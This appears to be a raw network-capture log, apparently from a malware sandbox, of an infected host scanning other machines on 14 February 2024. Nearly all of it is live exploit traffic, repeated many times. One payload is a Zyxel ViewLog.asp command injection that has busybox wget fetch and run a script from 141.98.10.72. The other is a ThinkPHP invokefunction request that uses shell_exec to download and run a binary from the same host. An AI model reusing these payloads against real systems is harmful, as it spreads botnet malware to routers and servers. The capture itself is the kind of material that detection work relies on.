                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:19.128329039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:21.847970009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:27.223345995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:37.973758936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.010483027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:44.012624979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            586192.168.2.235486495.160.104.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:17.120135069 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            587192.168.2.234321494.122.88.1828080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:17.133721113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            588192.168.2.235257494.121.190.2048080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:17.137187958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            589192.168.2.234491295.217.156.15680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.302659988 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:18.521013975 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            590192.168.2.233980695.216.159.21680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.307812929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:18.532419920 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            591192.168.2.233723495.250.222.2280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.314666033 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            592192.168.2.233749495.128.137.16180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.366179943 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:18.638501883 CET335INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.6.3
                                                            Date: Wed, 14 Feb 2024 08:29:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.6.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            593192.168.2.235840895.128.144.3780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.517066002 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:18.724240065 CET199INHTTP/1.0 400 Bad request
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            594192.168.2.235216695.100.13.19980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.893995047 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:19.269767046 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:19 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:19 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 34 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 39 26 23 34 36 3b 34 34 30 33 61 38 65 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;54722c31&#46;1707899359&#46;4403a8e9</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            595192.168.2.235842295.128.144.3780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:18.936718941 CET199INHTTP/1.0 400 Bad request
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            596192.168.2.233483495.163.85.5580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.328624964 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:19.560960054 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:19 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            597192.168.2.233421262.29.1.1538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.689918995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            598192.168.2.233760831.136.57.1028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:19.892501116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.504183054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:21.752017021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:24.407533884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:29.526967049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.509422064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.010433912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:41.964968920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
